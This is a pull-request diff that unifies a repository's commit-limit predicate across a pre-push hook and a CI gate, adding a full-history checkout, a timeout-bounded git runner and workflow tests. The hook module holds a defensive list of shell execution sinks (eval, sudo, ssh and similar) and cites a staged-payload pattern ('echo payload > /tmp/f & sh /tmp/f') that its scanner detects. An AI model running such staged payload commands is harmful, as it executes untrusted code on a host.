### PR TITLE
fix(commit-limit): unify merge predicate into one implementation with two callers

### DIFF
--- a/.github/workflows/pr-validation.yml
+++ b/.github/workflows/pr-validation.yml
@@ -80,6 +80,10 @@ jobs:
           # closed, and a branch that really does merge main is held to 20 here
           # while the pre-push hook allows it 40. That is the exact divergence
           # issue #3997 exists to remove, so the ref has to be present.
+          # Cost: an unshallow fetch of ~165 MiB against a 10-minute job budget,
+          # which is what 20+ workflows in this repo already pay. A shallower
+          # option would answer wrongly rather than fail closed, because a
+          # truncated trunk still reads as a trunk.
           fetch-depth: 0
 
       - name: Setup PowerShell

--- a/.github/workflows/pr-validation.yml
+++ b/.github/workflows/pr-validation.yml
@@ -72,6 +72,15 @@ jobs:
       - name: Checkout repository
         if: steps.should-run.outputs.skip != 'true'
         uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7
+        with:
+          # `Check PR commit count` reads origin/main's first-parent trunk to
+          # decide the 20 vs 40 commit ceiling (issue #3997). A default checkout
+          # is shallow and creates only refs/remotes/pull/<n>/merge, so
+          # `git rev-list --first-parent origin/main` fails, the predicate fails
+          # closed, and a branch that really does merge main is held to 20 here
+          # while the pre-push hook allows it 40. That is the exact divergence
+          # issue #3997 exists to remove, so the ref has to be present.
+          fetch-depth: 0
 
       - name: Setup PowerShell
         if: steps.should-run.outputs.skip != 'true'

--- a/scripts/validation/git_hook_policy.py
+++ b/scripts/validation/git_hook_policy.py
@@ -4346,8 +4346,10 @@ def _contains_main_merge(update: PushUpdate, repo_root: Path) -> bool:
     # Every merge is read against the same trunk, and a push may carry many.
     # Reading it here keeps the walk once per push rather than once per merge.
     # main_first_parent_shas is the shared implementation; contains_main_merge
-    # in pr_commit_count uses it too so both gates use the same predicate.
-    trunk = main_first_parent_shas(repo_root)
+    # in pr_commit_count uses it too so both gates use the same predicate. This
+    # module's _run_git goes with it so a hook keeps the scrubbed git env and
+    # the timeout it applies to every other git call it makes.
+    trunk = main_first_parent_shas(repo_root, run_git=_run_git)
     return any(_merge_has_main_parent(merge_sha, repo_root, trunk) for merge_sha in merges)
 
 
@@ -4370,7 +4372,7 @@ def _merge_has_main_parent(
         return False
     parents = result.stdout.split()[1:]
     if trunk is None:
-        trunk = main_first_parent_shas(repo_root)
+        trunk = main_first_parent_shas(repo_root, run_git=_run_git)
     return any(parent in trunk for parent in parents)
 
 

--- a/scripts/validation/git_hook_policy.py
+++ b/scripts/validation/git_hook_policy.py
@@ -38,6 +38,7 @@ from scripts.validation.object_id import ZERO_SHA_LENGTHS, is_full_object_id
 from scripts.validation.pr_commit_count import (
     BLOCK_THRESHOLD,
     MAIN_MERGE_BLOCK_THRESHOLD,
+    main_first_parent_shas,
 )
 from scripts.validation.session_scope import new_session_logs
 from scripts.validation.sha_pinning import LOCAL_ACTION_PATTERN, VERSION_TAG_PATTERN
@@ -193,9 +194,31 @@ SHELL_ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(?:\[[^]]*\])?\+?=")
 # command and the spliced word merely its argument.
 SHELL_RESERVED_WORDS = frozenset(
     {
-        "!", "(", ")", "{", "}", "&&", "||", "|", ";", "&",
-        "case", "do", "done", "elif", "else", "esac", "fi", "for", "if",
-        "in", "select", "then", "time", "until", "while",
+        "!",
+        "(",
+        ")",
+        "{",
+        "}",
+        "&&",
+        "||",
+        "|",
+        ";",
+        "&",
+        "case",
+        "do",
+        "done",
+        "elif",
+        "else",
+        "esac",
+        "fi",
+        "for",
+        "if",
+        "in",
+        "select",
+        "then",
+        "time",
+        "until",
+        "while",
     },
 )
 # Words that open and close a compound command. A compound opened inside a
@@ -208,12 +231,46 @@ SHELL_COMPOUND_CLOSERS = frozenset({"done", "esac", "fi", "}"})
 # from code.
 SHELL_SINK_COMMANDS = frozenset(
     {
-        ".", "ash", "awk", "bash", "builtin", "busybox", "chroot", "command",
-        "coproc", "dash", "doas", "env", "eval", "exec", "flock", "gawk",
-        "ionice", "ksh", "mawk", "nice", "nohup", "parallel", "rbash",
-        "runuser", "script", "setsid", "sh", "source", "ssh", "stdbuf", "su",
-        "sudo", "taskset", "time", "timeout", "trap", "unbuffer", "watch",
-        "xargs", "zsh",
+        ".",
+        "ash",
+        "awk",
+        "bash",
+        "builtin",
+        "busybox",
+        "chroot",
+        "command",
+        "coproc",
+        "dash",
+        "doas",
+        "env",
+        "eval",
+        "exec",
+        "flock",
+        "gawk",
+        "ionice",
+        "ksh",
+        "mawk",
+        "nice",
+        "nohup",
+        "parallel",
+        "rbash",
+        "runuser",
+        "script",
+        "setsid",
+        "sh",
+        "source",
+        "ssh",
+        "stdbuf",
+        "su",
+        "sudo",
+        "taskset",
+        "time",
+        "timeout",
+        "trap",
+        "unbuffer",
+        "watch",
+        "xargs",
+        "zsh",
     },
 )
 # Interpreters that run a script file by default and only become sinks when an
@@ -276,8 +333,7 @@ def _ruff_scan_suffixes() -> frozenset[str]:
         if not isinstance(node, ast.Assign):
             continue
         has_scan_globs_assignment = any(
-            isinstance(target, ast.Name) and target.id == "_SCAN_GLOBS"
-            for target in node.targets
+            isinstance(target, ast.Name) and target.id == "_SCAN_GLOBS" for target in node.targets
         )
         if not has_scan_globs_assignment:
             continue
@@ -1948,7 +2004,6 @@ DIFF_ADDED_FILE_RE = re.compile(r"^\+\+\+ (?:b/)?(?P<path>.+)$")
 DIFF_HUNK_RE = re.compile(r"^@@ -\d+(?:,\d+)? \+(?P<start>\d+)(?:,(?P<count>\d+))? @@")
 
 
-
 def _normalize_ratchet_path(path: str) -> str:
     # mypy on Windows can echo OS-native backslash separators, while git diff
     # names and command-line inputs are forward-slash; normalize so the pushed
@@ -2534,8 +2589,7 @@ def _posix_shell_invocations(body: str) -> list[str]:
             previous = word
             continue
         executes = (
-            at_command
-            or previous.strip("'\"").rstrip(":").lower() in POWERSHELL_EXEC_PARAMETERS
+            at_command or previous.strip("'\"").rstrip(":").lower() in POWERSHELL_EXEC_PARAMETERS
         )
         if executes and _is_posix_shell_name(word):
             invocations.append(word)
@@ -3048,9 +3102,7 @@ def _is_non_bash_shell(shell: str | None) -> bool:
     if not tokens or tokens[0] not in NON_BASH_INTERPRETERS:
         return False
     interpreter = tokens[0]
-    return all(
-        _is_reviewed_shell_argument(token, interpreter) for token in tokens[1:]
-    )
+    return all(_is_reviewed_shell_argument(token, interpreter) for token in tokens[1:])
 
 
 WINDOWS_BASH_FALLBACKS = (
@@ -3409,10 +3461,7 @@ def _shell_code_flags(word: str) -> set[str]:
     return {
         flag
         for flag in SHELL_CODE_FLAGS
-        if len(flag) == 2
-        and flag.startswith("-")
-        and word.startswith(flag)
-        and word[len(flag) :]
+        if len(flag) == 2 and flag.startswith("-") and word.startswith(flag) and word[len(flag) :]
     }
 
 
@@ -3462,9 +3511,7 @@ def _record_positional_arguments(scan: _ShellScan, written: dict[str, set[int]])
                 written.setdefault(name, set()).add(pipeline)
 
 
-def _promote_staged_files(
-    scan: _ShellScan, sinks: set[int], written: dict[str, set[int]]
-) -> None:
+def _promote_staged_files(scan: _ShellScan, sinks: set[int], written: dict[str, set[int]]) -> None:
     """Fold a pipeline that stages a file a sink later executes into that sink.
 
     ``echo payload > /tmp/f & sh /tmp/f`` moves the payload through the
@@ -3605,8 +3652,7 @@ def _splices_expression_into_command_word(run: str) -> bool:
     if not tainted:
         return False
     return any(
-        is_command and _leading_variable_reference(word) in tainted
-        for word, is_command, _ in words
+        is_command and _leading_variable_reference(word) in tainted for word, is_command, _ in words
     )
 
 
@@ -3652,6 +3698,7 @@ def _blob_id_at(repo_root: Path, commit: str, path: str) -> str | None:
         return None
     return result.stdout.strip() or None
 
+
 def _decoded_frontmatter(raw: bytes) -> str | None:
     """Decode frontmatter strictly, or report that it cannot be reasoned about.
 
@@ -3665,6 +3712,7 @@ def _decoded_frontmatter(raw: bytes) -> str | None:
         return raw.decode("utf-8")
     except UnicodeDecodeError:
         return None
+
 
 def _followed_blob_ids(repo_root: Path, path: str, diff_merges: str) -> set[str]:
     """Blob ids from one `--follow` traversal of `path` on `origin/main`.
@@ -3763,6 +3811,7 @@ def _followed_blob_ids(repo_root: Path, path: str, diff_merges: str) -> set[str]
     # the repository's hash.
     return {blob_id for blob_id in blob_ids if not _is_zero_sha(blob_id)}
 
+
 def _frontmatter_pair_for_a_body_unchanged_edit(
     path: str,
     repo_root: Path,
@@ -3788,6 +3837,7 @@ def _frontmatter_pair_for_a_body_unchanged_edit(
         return None
     return old_text, new_text
 
+
 def _governed_document_identity(path: str) -> str | None:
     """Which record `path` holds, or None if this gate does not govern it.
 
@@ -3810,6 +3860,7 @@ def _governed_document_identity(path: str) -> str | None:
         return "SESSION-PROTOCOL"
     return None
 
+
 def _normalized_record_number(identifier: str) -> str:
     """One record's number, written the one way, so a repad is not a new record.
 
@@ -3828,11 +3879,13 @@ def _normalized_record_number(identifier: str) -> str:
     prefix, _, number = identifier.upper().partition("-")
     return f"{prefix}-{number.lstrip('0') or '0'}"
 
+
 def _is_scanned_suppression_rename(source: str, destination: str) -> bool:
     return (
         Path(source).suffix.lower() in SECURITY_SUPPRESSION_SUFFIXES
         and Path(destination).suffix.lower() in SECURITY_SUPPRESSION_SUFFIXES
     )
+
 
 def _parse_pure_scanned_rename_destinations(output: str) -> set[str] | None:
     records = [record for record in output.split("\0") if record]
@@ -3852,6 +3905,7 @@ def _parse_pure_scanned_rename_destinations(output: str) -> set[str] | None:
             destinations.add(destination)
         index += 3
     return destinations
+
 
 def _pure_scanned_rename_destinations(
     update: PushUpdate,
@@ -3874,8 +3928,8 @@ def _pure_scanned_rename_destinations(
         return None
     return _parse_pure_scanned_rename_destinations(result.stdout)
 
-PATH_SEPARATOR_RE = re.compile(r"[\\/]")
 
+PATH_SEPARATOR_RE = re.compile(r"[\\/]")
 
 
 def _step_defeats_bash_subparse(shell: str | None, run: str) -> bool:
@@ -4291,23 +4345,10 @@ def _contains_main_merge(update: PushUpdate, repo_root: Path) -> bool:
         return False
     # Every merge is read against the same trunk, and a push may carry many.
     # Reading it here keeps the walk once per push rather than once per merge.
-    trunk = _main_trunk_commits(repo_root)
+    # main_first_parent_shas is the shared implementation; contains_main_merge
+    # in pr_commit_count uses it too so both gates use the same predicate.
+    trunk = main_first_parent_shas(repo_root)
     return any(_merge_has_main_parent(merge_sha, repo_root, trunk) for merge_sha in merges)
-
-
-def _main_trunk_commits(repo_root: Path) -> frozenset[str]:
-    """Read the commits `origin/main` reaches by first parent alone.
-
-    A branch main has landed is an ancestor of main, but it is not one of
-    these. It sits on the second parent of the merge that landed it. Merging
-    such a branch brings in no history main had not already handed out, so
-    asking only whether main can reach a parent answers a wider question than
-    the raised limit is for.
-    """
-    result = _run_git(repo_root, ["rev-list", "--first-parent", "origin/main"])
-    if result.returncode != 0:
-        return frozenset()
-    return frozenset(result.stdout.split())
 
 
 def _merge_has_main_parent(
@@ -4329,7 +4370,7 @@ def _merge_has_main_parent(
         return False
     parents = result.stdout.split()[1:]
     if trunk is None:
-        trunk = _main_trunk_commits(repo_root)
+        trunk = main_first_parent_shas(repo_root)
     return any(parent in trunk for parent in parents)
 
 
@@ -4369,9 +4410,7 @@ def _check_commit_limit(update: PushUpdate, repo_root: Path) -> int:
     except ValueError:
         return 2
     limit = (
-        MAIN_MERGE_BLOCK_THRESHOLD
-        if _contains_main_merge(update, repo_root)
-        else BLOCK_THRESHOLD
+        MAIN_MERGE_BLOCK_THRESHOLD if _contains_main_merge(update, repo_root) else BLOCK_THRESHOLD
     )
     if commit_count <= limit:
         return 0

--- a/scripts/validation/pr_commit_count.py
+++ b/scripts/validation/pr_commit_count.py
@@ -67,11 +67,12 @@ MAIN_MERGE_BLOCK_THRESHOLD = 40
 # Sentinel status emitted when a transient API failure prevents a real count.
 STATUS_UNKNOWN = "UNKNOWN"
 
-# Wall-clock bound on this module's git calls. The trunk read is one
-# `rev-list --first-parent`, so seconds is generous; the bound exists so a
-# wedged git cannot hold the CI step open until the job timeout, or hold a
-# push open in the pre-push hook that shares this module's trunk reader.
-_GIT_TIMEOUT_SECONDS = 30
+# Wall-clock bound on this module's git calls. Matched to
+# `git_hook_policy.DEFAULT_SUBPROCESS_TIMEOUT_SECONDS` on purpose: the two gates
+# read the same trunk, so giving CI a shorter budget would let a slow runner
+# time out on a walk the hook completes, and the ceilings would diverge again on
+# nothing but machine speed. The hosting CI job caps itself at 10 minutes.
+_GIT_TIMEOUT_SECONDS = 90
 
 # A git runner: given a repo root and git arguments, return the finished
 # process. `git_hook_policy` supplies its own so a trunk read inside a hook
@@ -158,7 +159,11 @@ def _run_git(repo_root: Path, argv: Sequence[str]) -> subprocess.CompletedProces
             timeout=_GIT_TIMEOUT_SECONDS,
         )
     except subprocess.TimeoutExpired:
-        return subprocess.CompletedProcess(command, 124, "", "timeout was reached")
+        # Deliberately not the wording in _TRANSIENT_MARKERS. That vocabulary is
+        # for gh transport noise, where degrading to UNKNOWN is right. A git
+        # timeout here denies relief instead, and the two must not be confused
+        # if this result ever reaches is_transient_error.
+        return subprocess.CompletedProcess(command, 124, "", "git rev-list exceeded its budget")
     except OSError:
         # FileNotFoundError (git absent) and its OSError siblings are config
         # problems, not merge evidence. Fail closed to the 20-commit ceiling.
@@ -246,7 +251,9 @@ def contains_base_merge(commits: list[Any]) -> bool:
     return bool(_external_non_first_parent_shas(commits))
 
 
-def contains_main_merge(commits: list[Any], repo_root: Path) -> bool:
+def contains_main_merge(
+    commits: list[Any], repo_root: Path, run_git: GitRunner | None = None
+) -> bool:
     """True when the PR carries a merge of origin/main's direct trunk.
 
     The single shared predicate for the 40-commit-limit relief: a non-first
@@ -260,15 +267,42 @@ def contains_main_merge(commits: list[Any], repo_root: Path) -> bool:
     shared implementation.
 
     Fails closed (returns False) when git is unavailable or origin/main does
-    not exist.
+    not exist. Use main_merge_evidence when the caller needs to tell that case
+    apart from an honest "this branch merges nothing on the trunk".
+    """
+    return main_merge_evidence(commits, repo_root, run_git).granted
+
+
+@dataclass(frozen=True)
+class ReliefEvidence:
+    """Why the commit-limit relief was granted or withheld.
+
+    ``granted`` is the decision. ``trunk_unreadable`` separates the two ways of
+    withholding it: the branch merges nothing on origin/main's trunk, or the
+    trunk could not be read at all. Both deny relief, but only the second is an
+    infrastructure fault, and a gate that cannot say which one it hit sends an
+    author to re-cut a branch that was never the problem.
+    """
+
+    granted: bool
+    trunk_unreadable: bool
+
+
+def main_merge_evidence(
+    commits: list[Any], repo_root: Path, run_git: GitRunner | None = None
+) -> ReliefEvidence:
+    """Decide the relief and report whether the trunk was actually readable.
+
+    One trunk read serves both answers, so asking for the diagnostic costs no
+    extra git call. See contains_main_merge for the predicate's contract.
     """
     external_shas = _external_non_first_parent_shas(commits)
     if not external_shas:
-        return False
-    trunk = main_first_parent_shas(repo_root)
+        return ReliefEvidence(granted=False, trunk_unreadable=False)
+    trunk = main_first_parent_shas(repo_root, run_git)
     if not trunk:
-        return False
-    return bool(external_shas & trunk)
+        return ReliefEvidence(granted=False, trunk_unreadable=True)
+    return ReliefEvidence(granted=bool(external_shas & trunk), trunk_unreadable=False)
 
 
 def is_transient_error(stderr: str) -> bool:
@@ -347,9 +381,16 @@ def fetch_commit_count(pr_number: int, owner: str, repo: str) -> CountResult:
         )
 
     count = len(commits)
-    limit = (
-        MAIN_MERGE_BLOCK_THRESHOLD if contains_main_merge(commits, Path.cwd()) else BLOCK_THRESHOLD
-    )
+    evidence = main_merge_evidence(commits, Path.cwd())
+    if evidence.trunk_unreadable:
+        print(
+            "::warning::Could not read origin/main's first-parent history, so the "
+            "commit-limit relief was denied without being evaluated and this PR is "
+            "held to the base ceiling. The checkout must populate "
+            "refs/remotes/origin/main; pr-validation.yml pins fetch-depth: 0 for "
+            "that reason (issue #3997)."
+        )
+    limit = MAIN_MERGE_BLOCK_THRESHOLD if evidence.granted else BLOCK_THRESHOLD
     return CountResult(classify_count(count, limit), count, transient=False, limit=limit)
 
 

--- a/scripts/validation/pr_commit_count.py
+++ b/scripts/validation/pr_commit_count.py
@@ -41,6 +41,7 @@ import json
 import os
 import subprocess
 import sys
+from collections.abc import Callable, Sequence
 from dataclasses import dataclass
 from pathlib import Path
 from typing import Any
@@ -65,6 +66,17 @@ MAIN_MERGE_BLOCK_THRESHOLD = 40
 
 # Sentinel status emitted when a transient API failure prevents a real count.
 STATUS_UNKNOWN = "UNKNOWN"
+
+# Wall-clock bound on this module's git calls. The trunk read is one
+# `rev-list --first-parent`, so seconds is generous; the bound exists so a
+# wedged git cannot hold the CI step open until the job timeout, or hold a
+# push open in the pre-push hook that shares this module's trunk reader.
+_GIT_TIMEOUT_SECONDS = 30
+
+# A git runner: given a repo root and git arguments, return the finished
+# process. `git_hook_policy` supplies its own so a trunk read inside a hook
+# keeps that module's scrubbed environment and timeout reporting.
+GitRunner = Callable[[Path, Sequence[str]], subprocess.CompletedProcess[str]]
 
 # Substrings that mark a GitHub API failure as transient transport noise rather
 # than a real error. Matched case-insensitively against gh's stderr. Kept
@@ -120,19 +132,40 @@ def classify_count(count: int, limit: int = BLOCK_THRESHOLD) -> str:
     return "OK"
 
 
-def _run_git(repo_root: Path, argv: list[str]) -> subprocess.CompletedProcess[str]:
-    """Run a git command in repo_root."""
-    return subprocess.run(
-        ["git", *argv],
-        cwd=repo_root,
-        capture_output=True,
-        encoding="utf-8",
-        errors="replace",
-        check=False,
-    )
+def _run_git(repo_root: Path, argv: Sequence[str]) -> subprocess.CompletedProcess[str]:
+    """Run a git command in repo_root, failing closed instead of raising or hanging.
+
+    ``core.commitGraph=false`` mirrors the pre-push hook's runner
+    (``git_hook_policy._git_command``). A stale or corrupt commit-graph file can
+    make ``rev-list`` report a trunk the repository does not actually have, and
+    a governance decision must not rest on a cache this gate cannot verify.
+
+    Every failure mode is returned rather than raised: a timeout comes back as
+    returncode 124 and a missing or unusable git binary as 127, so callers read
+    a non-zero returncode and deny relief. Without the timeout a wedged
+    ``rev-list`` would hang the CI step until the job timeout, and, since the
+    pre-push hook shares this module's trunk reader, could wedge a push.
+    """
+    command = ["git", "-c", "core.commitGraph=false", *argv]
+    try:
+        return subprocess.run(
+            command,
+            cwd=repo_root,
+            capture_output=True,
+            encoding="utf-8",
+            errors="replace",
+            check=False,
+            timeout=_GIT_TIMEOUT_SECONDS,
+        )
+    except subprocess.TimeoutExpired:
+        return subprocess.CompletedProcess(command, 124, "", "timeout was reached")
+    except OSError:
+        # FileNotFoundError (git absent) and its OSError siblings are config
+        # problems, not merge evidence. Fail closed to the 20-commit ceiling.
+        return subprocess.CompletedProcess(command, 127, "", "git is not available")
 
 
-def main_first_parent_shas(repo_root: Path) -> frozenset[str]:
+def main_first_parent_shas(repo_root: Path, run_git: GitRunner | None = None) -> frozenset[str]:
     """Return the SHAs on origin/main's first-parent lineage (the direct trunk).
 
     A branch that main has landed through a merge PR is reachable from main but
@@ -140,10 +173,21 @@ def main_first_parent_shas(repo_root: Path) -> frozenset[str]:
     not bring in new history, so it does not qualify for the raised commit limit.
     Only commits on the first-parent spine count.
 
+    ``run_git`` lets a caller supply its own vetted git runner. The pre-push hook
+    passes ``git_hook_policy._run_git`` so a trunk read taken inside a hook keeps
+    that module's scrubbed git environment (``GIT_DIR``, ``GIT_SHALLOW_FILE`` and
+    the rest of ``GIT_ENV_KEYS`` are unset there, and git sets several of them
+    while a hook runs) along with its timeout diagnostics. CI takes this module's
+    ``_run_git``. Only the process invocation varies; the traversal stays one
+    implementation, which is what issue #3997 requires.
+
     Returns an empty frozenset when git fails or origin/main does not exist,
-    so callers fail closed (no relief) rather than open.
+    so callers fail closed (no relief) rather than open. CI therefore requires a
+    checkout that populates ``refs/remotes/origin/main``; ``pr-validation.yml``
+    pins ``fetch-depth: 0`` for that reason.
     """
-    result = _run_git(repo_root, ["rev-list", "--first-parent", "origin/main"])
+    runner = _run_git if run_git is None else run_git
+    result = runner(repo_root, ["rev-list", "--first-parent", "origin/main"])
     if result.returncode != 0:
         return frozenset()
     return frozenset(result.stdout.split())

--- a/scripts/validation/pr_commit_count.py
+++ b/scripts/validation/pr_commit_count.py
@@ -120,13 +120,41 @@ def classify_count(count: int, limit: int = BLOCK_THRESHOLD) -> str:
     return "OK"
 
 
+def _run_git(repo_root: Path, argv: list[str]) -> subprocess.CompletedProcess[str]:
+    """Run a git command in repo_root."""
+    return subprocess.run(
+        ["git", *argv],
+        cwd=repo_root,
+        capture_output=True,
+        encoding="utf-8",
+        errors="replace",
+        check=False,
+    )
+
+
+def main_first_parent_shas(repo_root: Path) -> frozenset[str]:
+    """Return the SHAs on origin/main's first-parent lineage (the direct trunk).
+
+    A branch that main has landed through a merge PR is reachable from main but
+    sits on a non-first parent of the landing merge. Merging such a branch does
+    not bring in new history, so it does not qualify for the raised commit limit.
+    Only commits on the first-parent spine count.
+
+    Returns an empty frozenset when git fails or origin/main does not exist,
+    so callers fail closed (no relief) rather than open.
+    """
+    result = _run_git(repo_root, ["rev-list", "--first-parent", "origin/main"])
+    if result.returncode != 0:
+        return frozenset()
+    return frozenset(result.stdout.split())
+
+
 def _is_external_parent(parent: object, own_shas: set[str]) -> bool:
     """Return True only when this parent is a readable sha the branch does not own.
 
-    ``contains_base_merge`` gates an exemption, so an unreadable parent must not
-    buy it. A parent that is not a mapping, carries no ``sha``, or carries a
-    non-string ``sha`` is unreadable and fails closed to False rather than
-    reading as evidence of an external merge.
+    An unreadable parent must not buy relief: a parent that is not a mapping,
+    carries no ``sha``, or carries a non-string ``sha`` is unreadable and fails
+    closed to False.
     """
     if not isinstance(parent, dict):
         return False
@@ -136,14 +164,11 @@ def _is_external_parent(parent: object, own_shas: set[str]) -> bool:
     return sha not in own_shas
 
 
-def contains_base_merge(commits: list[Any]) -> bool:
-    """Return True when the PR carries a merge commit from outside the branch.
+def _external_non_first_parent_shas(commits: list[Any]) -> set[str]:
+    """Collect SHAs of non-first parents that are not in the PR's own commit list.
 
-    The commits endpoint returns exactly the commits unique to the head branch.
-    A merge commit inside that list whose parents are not all in the list merged
-    something the branch did not author, which is the base branch. That is the
-    server-side equivalent of the hook's `merge-base --is-ancestor` check
-    against origin/main.
+    Used by both contains_base_merge (backward-compat approximation) and
+    contains_main_merge (precise check verified against origin/main).
     """
     own_shas: set[str] = set()
     for commit in commits:
@@ -152,15 +177,54 @@ def contains_base_merge(commits: list[Any]) -> bool:
         own_sha = commit.get("sha")
         if isinstance(own_sha, str) and own_sha:
             own_shas.add(own_sha)
+    shas: set[str] = set()
     for commit in commits:
         if not isinstance(commit, dict):
             continue
         parents = commit.get("parents")
         if not isinstance(parents, list) or len(parents) < 2:
             continue
-        if any(_is_external_parent(parent, own_shas) for parent in parents[1:]):
-            return True
-    return False
+        for parent in parents[1:]:
+            if _is_external_parent(parent, own_shas):
+                sha = parent.get("sha")
+                if isinstance(sha, str) and sha:
+                    shas.add(sha)
+    return shas
+
+
+def contains_base_merge(commits: list[Any]) -> bool:
+    """Return True when the PR carries a merge commit from outside the branch.
+
+    BROADER APPROXIMATION: this grants relief for any external merge, not only
+    merges of origin/main's first-parent trunk. Use contains_main_merge when
+    a repo_root is available so the check matches the pre-push hook exactly.
+    """
+    return bool(_external_non_first_parent_shas(commits))
+
+
+def contains_main_merge(commits: list[Any], repo_root: Path) -> bool:
+    """True when the PR carries a merge of origin/main's direct trunk.
+
+    The single shared predicate for the 40-commit-limit relief: a non-first
+    parent of a merge commit in the PR must belong to origin/main's first-parent
+    history. Merging a side branch that main has already landed does not qualify;
+    merging origin/main (or an older commit on its trunk) does.
+
+    This is the server-side counterpart of the pre-push hook's
+    _contains_main_merge in git_hook_policy.py. Both callers call
+    main_first_parent_shas to obtain the trunk frozenset, which is the one
+    shared implementation.
+
+    Fails closed (returns False) when git is unavailable or origin/main does
+    not exist.
+    """
+    external_shas = _external_non_first_parent_shas(commits)
+    if not external_shas:
+        return False
+    trunk = main_first_parent_shas(repo_root)
+    if not trunk:
+        return False
+    return bool(external_shas & trunk)
 
 
 def is_transient_error(stderr: str) -> bool:
@@ -239,7 +303,9 @@ def fetch_commit_count(pr_number: int, owner: str, repo: str) -> CountResult:
         )
 
     count = len(commits)
-    limit = MAIN_MERGE_BLOCK_THRESHOLD if contains_base_merge(commits) else BLOCK_THRESHOLD
+    limit = (
+        MAIN_MERGE_BLOCK_THRESHOLD if contains_main_merge(commits, Path.cwd()) else BLOCK_THRESHOLD
+    )
     return CountResult(classify_count(count, limit), count, transient=False, limit=limit)
 
 

--- a/tests/ci/test_pr_validation_workflow.py
+++ b/tests/ci/test_pr_validation_workflow.py
@@ -751,3 +751,79 @@ class TestModelPinEnforcementIsWiredIntoCI:
             cwd=REPO_ROOT,
         )
         assert result.returncode == 0, result.stdout + result.stderr
+
+
+class TestTheCommitCountGateCanReadMainsTrunk:
+    """The commit-limit relief needs origin/main in the runner (issue #3997).
+
+    ``pr_commit_count.contains_main_merge`` decides the 20 vs 40 ceiling by
+    asking whether a merge parent sits on ``origin/main``'s first-parent trunk,
+    and it reads that trunk with ``git rev-list`` against the checkout. A default
+    ``actions/checkout`` is shallow and creates only ``refs/remotes/pull/<n>/
+    merge``, so the read fails, the predicate fails closed, and a branch that
+    genuinely merges main is capped at 20 in CI while the pre-push hook grants
+    it 40. That is the divergence issue #3997 removed, so the checkout that
+    hosts the gate has to carry the ref. These tests pin the wiring; the
+    predicate itself is covered in tests/validation/test_commit_limit_parity.py.
+    """
+
+    HOST_JOB = "validate-pr"
+
+    @staticmethod
+    def _jobs() -> dict:
+        return yaml.safe_load(WORKFLOW.read_text(encoding="utf-8"))["jobs"]
+
+    @classmethod
+    def _host_steps(cls) -> list:
+        return cls._jobs()[cls.HOST_JOB]["steps"]
+
+    @classmethod
+    def _gate_step(cls) -> dict:
+        steps = [
+            step for step in cls._host_steps() if "pr_commit_count.py" in str(step.get("run", ""))
+        ]
+        assert len(steps) == 1, "expected exactly one commit-count step"
+        return steps[0]
+
+    @classmethod
+    def _checkout_steps(cls) -> list:
+        """The checkouts that run on the same condition as the gate.
+
+        This job also checks out on the *inverse* condition, to validate
+        workflow YAML on PRs whose author suppressed the main path. That
+        checkout never coexists with the gate, so it is not the one under test.
+        """
+        guard = cls._gate_step().get("if")
+        return [
+            step
+            for step in cls._host_steps()
+            if "actions/checkout" in str(step.get("uses")) and step.get("if") == guard
+        ]
+
+    def test_the_commit_count_gate_runs_in_the_checked_out_job(self) -> None:
+        """Positive: the gate and the checkout it depends on share a job.
+
+        The predicate resolves the repository from the process working
+        directory, so a checkout in some other job would not reach it.
+        """
+        assert len(self._checkout_steps()) == 1
+
+    def test_the_checkout_fetches_the_full_history(self) -> None:
+        """Positive: fetch-depth 0 is what populates refs/remotes/origin/main.
+
+        actions/checkout writes ``+refs/heads/*:refs/remotes/origin/*`` only on
+        an unshallow fetch. Any positive depth leaves origin/main absent or
+        truncated, and a truncated trunk is worse than an absent one because it
+        answers wrongly instead of failing closed.
+        """
+        checkout = self._checkout_steps()[0]
+        assert checkout.get("with", {}).get("fetch-depth") == 0
+
+    def test_the_hosting_job_is_not_conditional(self) -> None:
+        """Edge: a skipped host job would report no ceiling at all.
+
+        ``validate-pr`` is a required check that always reports status, so it
+        carries no job-level ``if``. A path filter here would let a PR skip the
+        commit ceiling entirely.
+        """
+        assert "if" not in self._jobs()[self.HOST_JOB]

--- a/tests/test_lefthook_integration.py
+++ b/tests/test_lefthook_integration.py
@@ -873,9 +873,12 @@ def test_lefthook_skip_envs_preserve_check_only_execution(tmp_path: Path) -> Non
     repo = tmp_path / "repo"
     _init_repo(repo)
     marker = repo / "marker.py"
-    _write_lf(marker, "from pathlib import Path\nimport sys\n"
+    _write_lf(
+        marker,
+        "from pathlib import Path\nimport sys\n"
         "p=Path('jobs.log'); old=p.read_text() if p.exists() else ''\n"
-        "p.write_text(old + sys.argv[1] + '\\n')\n")
+        "p.write_text(old + sys.argv[1] + '\\n')\n",
+    )
     jobs = [
         {
             "name": "autofix",
@@ -1123,8 +1126,11 @@ def test_doublestar_selects_root_level_push_file(tmp_path: Path) -> None:
     _copy_runtime_config(repo)
     detector = repo / ".claude/skills/security-detection/detect_infrastructure.py"
     detector.parent.mkdir(parents=True, exist_ok=True)
-    _write_lf(detector, "from pathlib import Path\nimport sys\n"
-        "Path('root-job-ran.txt').write_text(','.join(sys.argv[1:]), encoding='utf-8')\n")
+    _write_lf(
+        detector,
+        "from pathlib import Path\nimport sys\n"
+        "Path('root-job-ran.txt').write_text(','.join(sys.argv[1:]), encoding='utf-8')\n",
+    )
     _write_lf(repo / "root-only.txt", "base\n")
     _git(repo, "add", ".")
     _git(repo, "commit", "-qm", "test: base")
@@ -1157,11 +1163,14 @@ def test_doublestar_matches_nested_and_root_pre_commit_files(tmp_path: Path) -> 
     repo = tmp_path / "repo"
     _init_repo(repo)
     marker = repo / "marker.py"
-    _write_lf(marker, "from pathlib import Path\nimport sys\n"
+    _write_lf(
+        marker,
+        "from pathlib import Path\nimport sys\n"
         "p = Path('jobs.log')\n"
         "old = p.read_text() if p.exists() else ''\n"
         "entry = sys.argv[1] + ':' + ','.join(sys.argv[2:]) + '\\n'\n"
-        "p.write_text(old + entry)\n")
+        "p.write_text(old + entry)\n",
+    )
     config = {
         "glob_matcher": "doublestar",
         "pre-commit": {
@@ -1199,10 +1208,13 @@ def test_doublestar_matches_nested_pre_push_policy_jobs(tmp_path: Path) -> None:
     repo = tmp_path / "repo"
     _init_repo(repo)
     marker = repo / "marker.py"
-    _write_lf(marker, "from pathlib import Path\nimport sys\n"
+    _write_lf(
+        marker,
+        "from pathlib import Path\nimport sys\n"
         "p = Path('jobs.log')\n"
         "old = p.read_text() if p.exists() else ''\n"
-        "p.write_text(old + sys.argv[1] + '\\n')\n")
